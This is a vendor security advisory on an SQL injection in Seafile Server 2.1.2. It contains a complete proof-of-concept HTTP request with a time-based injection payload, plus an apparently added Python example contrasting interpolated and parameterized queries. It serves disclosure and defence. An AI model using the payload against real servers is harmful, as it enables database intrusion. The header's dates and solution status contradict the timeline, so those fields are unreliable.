Advisory - Seafile Server Community Edition

Advisory: Seafile Server Community Edition

Advisory ID: SYSS-2014-001
Product: Seafile Server Community Edition
Vendor: Seafile Ltd.
Affected Version(s): until 2.1.2 Linux
Tested Version(s): 2.1.2 Linux, 2.1.3 Linux
Vulnerability Type: SQL Injection
Risk Level: High
Solution Status: None
Vendor Notification: January, 2014
Solution Date: Open
Public Disclosure: Open
CVE Reference: Not assigned
Author Advisory: Marcel Mangold, SySS GmbH, https://www.syss.de/advisories/
Document date: 2013-01-07

 

Overview

The software suffers from at least one SQL injection vulnerability.

 

Vulnerability Details:

The script which handles requests to message/message_send/?from=user has a POST parameter called mass_email that is vulnerable to SQL injection. (Fixed in version 2.1.3.)

Proof of Concept (PoC):

 

Request:

+------------------------------------

POST /message/message_send/?from=user HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFToken: dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk
X-Requested-With: XMLHttpRequest
Referer: 127.0.0.1/user/2/msgs/
Content-Length: 120
Cookie: csrftoken=dAjlY2zLmP1SmdoneDzTBRG6XynhhAVk; sessionid=zrqax2zwfbjo51h8ttilp7r7yujrwxeq
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss

 

Effect

Response is delayed - if the value of mass_email is changed to victim%40sample.xy the answer is delivered almost instantly. The vulnerability could be verified using sqlmap [3].
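The defect class behind this advisory (a request parameter interpolated into SQL text) beside the parameterized form that fixes it, as an added example that is not Seafile's code: the table name, schema and lookup functions are constructed stand-ins, and only the PoC request body is taken from the page.

```python
import sqlite3
from urllib.parse import parse_qs

# Request body from the advisory's PoC (copied from the page).
POC_BODY = ("mass_msg=asdf&mass_email=victim%40sample.xy'+AND+1%3dLIKE('SYSS',"
            "UPPER(HEX(RANDOMBLOB(500000000/2))))+AND+'syss'%3d'syss")

def decode_mass_email(body):
    """Decode the form body the way the web framework does; return mass_email."""
    return parse_qs(body)["mass_email"][0]

def make_db():
    """Constructed in-memory stand-in for a user table (assumption, not seahub's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE EmailUser (email TEXT PRIMARY KEY)")
    conn.execute("INSERT INTO EmailUser VALUES ('victim@sample.xy')")
    return conn

def lookup_vulnerable(conn, email):
    """Interpolates the parameter into the SQL text: the defect class in the advisory."""
    sql = "SELECT email FROM EmailUser WHERE email = '%s'" % email
    return [row[0] for row in conn.execute(sql)]

def lookup_fixed(conn, email):
    """Binds the parameter with a placeholder; the driver never parses it as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT email FROM EmailUser WHERE email = ?", (email,))]

def quote_breaks_query(conn):
    """Functional check with a legitimate address containing an apostrophe.

    Returns True when the interpolating version fails on it: the same symptom
    a code review should flag as an injection sink."""
    try:
        lookup_vulnerable(conn, "o'brien@sample.xy")
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    conn = make_db()
    payload = decode_mass_email(POC_BODY)
    print(payload)  # the decoded SQL fragment as it appears in request logs
    print(lookup_fixed(conn, payload))             # [] : treated as a literal address
    print(lookup_fixed(conn, "victim@sample.xy"))  # ['victim@sample.xy']
    print(quote_breaks_query(conn))                # True
```

With the placeholder version the PoC value matches no user and returns immediately, which is the behaviour to expect from the 2.1.3 fix when re-testing.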

Solution

Update to version 2.1.3.

Disclosure Timeline

2014-01-07 - Vulnerability discovered

2014-01-07 - Vulnerability reported to developer

2014-01-08 - Fix committed to GitHub by developer

2014-01-11 - Information about fix sent to me by email

2014-01-13 - Verified fix

 

References

 

[1] SySS GmbH, SYSS-2013-002 - www.syss.de/advisories/SYSS-2014-001 - SQL-Injection in Seafile 2.1.2 Server

[2] SySS GmbH, SySS Responsible Disclosure Policy - www.syss.de/responsible_disclosure_policy

[3] sqlmap.org

 

Credits

 

Security vulnerability found by Responsible Hacker of the SySS GmbH.
E-Mail: marcel.mangold@syss.de
Public Key: www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Marcel_Mangold.asc
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

 

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site [1].

 

Copyright

 

Creative Commons - Attribution (by) - Version 3.0 URL: creativecommons.org/licenses/by/3.0/deed.en

Your direct contact to SySS: +49 (0)7071 - 40 78 56-0 or anfrage@syss.de | IN URGENT CASES OUTSIDE BUSINESS HOURS: +49 (0)7071 - 40 78 56-99

As a framework agreement customer, please dial the on-call number provided to you.
